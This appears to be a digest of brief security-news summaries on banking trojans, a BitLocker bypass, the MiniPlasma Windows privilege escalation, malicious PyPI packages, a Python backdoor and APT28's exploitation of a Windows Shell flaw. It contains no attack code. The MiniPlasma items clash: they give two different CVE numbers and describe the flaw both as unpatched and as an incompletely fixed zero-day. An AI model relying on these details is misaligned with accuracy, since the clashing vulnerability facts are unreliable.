VulnHub

Recent reports from WatchGuard and ESET reveal two banking trojan campaigns targeting users in Latin America and Europe. The Grandoreiro malware is aimed at Windows devices, while the BTMOB RAT is designed for Android users. These campaigns specifically target companies in Spain, Portugal, and Mexico, as well as mobile users in Brazil. The malware's ability to siphon sensitive financial information poses a significant risk to both businesses and individual users. As cybercriminals continue to adapt their tactics, it's crucial for users to remain vigilant and implement security measures to protect their devices and data.

Microsoft has addressed a significant vulnerability in its BitLocker encryption feature, identified as YellowKey and tracked under the CVE-2026-45585 designation. This security flaw, which has a CVSS score of 6.8, allows attackers to bypass key protections, potentially exposing sensitive data on affected systems. The issue was publicly disclosed last week, prompting Microsoft to issue a mitigation to protect users. This vulnerability primarily affects Windows operating systems that utilize BitLocker for disk encryption. Given that BitLocker is widely used by businesses and individuals to secure data, the implications of this flaw are serious, making it crucial for users to implement the provided mitigation as soon as possible.

A researcher has released an exploit called MiniPlasma that targets a Windows vulnerability from 2020, identified as CVE-2020-17087, which remains unpatched. This exploit uses the original proof-of-concept code, and it has raised concerns among security experts about its potential use in real-world attacks. The vulnerability affects various versions of Windows, making a significant number of users and organizations vulnerable if they have not applied necessary updates. The release of this exploit could lead to increased risks for those systems still running the affected versions, as attackers may use it for unauthorized access or other malicious activities. Companies and users are urged to check their systems and apply any available patches to protect against potential exploitation.

A security researcher known as Chaotic Eclipse has disclosed a serious zero-day vulnerability in Windows called MiniPlasma, which allows attackers to gain SYSTEM privileges on fully updated Windows 11 systems. This flaw, affecting the 'cldflt.sys' file, was believed to have been patched back in 2020 under the CVE-2020-17103 designation, but it appears that the fix was either incomplete or not properly implemented. The existence of a proof-of-concept exploit for this vulnerability raises significant concerns for users and organizations, as it could allow malicious actors to escalate their privileges and potentially take control of affected systems. This issue affects all patched versions of Windows 11, meaning a wide range of users are at risk. Companies should prioritize reviewing their security protocols and consider additional monitoring to mitigate potential exploitation.

A cybersecurity researcher has disclosed a serious vulnerability in Windows, known as 'MiniPlasma', which allows attackers to escalate their privileges to SYSTEM level on fully patched systems. This zero-day exploit poses a significant risk because it can enable unauthorized access to sensitive data and system controls. Users of Windows systems, particularly those in corporate environments, should be on high alert as this exploit can potentially be used in cyberattacks. The researcher has also released a proof-of-concept (PoC) for the exploit, which can facilitate its misuse by malicious actors. This situation underscores the need for immediate attention to system security measures and vigilance against potential exploitation.

Cybersecurity researchers have identified three malicious packages on the Python Package Index (PyPI) that are distributing a new type of malware called ZiChatBot. These packages are designed to deliver harmful files while masquerading as legitimate software. Both Windows and Linux systems are at risk, as the malware can operate on both platforms. This incident raises concerns about the security of open-source repositories, where malicious actors can exploit the trust users place in these resources. Developers and users of Python packages should be vigilant and verify the authenticity of packages before installation to avoid falling victim to such attacks.

Researchers have identified a new Python-based backdoor called DEEP#DOOR, which is designed to gain persistent access to compromised systems and steal sensitive information, including browser and cloud credentials. The attack is initiated through a batch script named 'install_obf.bat', which disables essential Windows security features, allowing the malware to operate undetected. This backdoor can pose significant risks to both individual users and organizations, as it can access a wide range of data stored on affected devices. The stealthy nature of DEEP#DOOR makes it particularly dangerous, as it can remain hidden while actively siphoning off sensitive credentials. Users and companies need to be vigilant about their security measures to prevent such intrusions.

CISA and Microsoft have issued a warning about the exploitation of a Windows Shell vulnerability identified as CVE-2026-32202. This zero-click vulnerability allows attackers to trick victims' systems into authenticating with the attacker's server, potentially exposing sensitive information. CVE-2026-32202 is linked to an incomplete fix for a previous vulnerability (CVE-2026-21510), which was targeted by the APT28 group using malicious LNK files. Microsoft had released patches for these vulnerabilities in February 2026, but the new exploit indicates that attackers have found ways to bypass these security measures. Users and organizations running affected systems need to be vigilant and apply available updates to safeguard against these kinds of attacks.

A recently identified vulnerability in Windows has been exploited by APT28, a hacking group linked to Russia, in attacks targeting Ukraine and several EU nations. This flaw allows for zero-click attacks, meaning attackers can compromise systems without any user interaction. The incomplete patch aimed at fixing this vulnerability has raised concerns about its effectiveness, potentially leaving users at risk. The ongoing exploitation of this vulnerability poses a serious threat to sensitive data and national security for affected countries. As this situation evolves, it is crucial for Windows users to stay updated on patches and security advisories.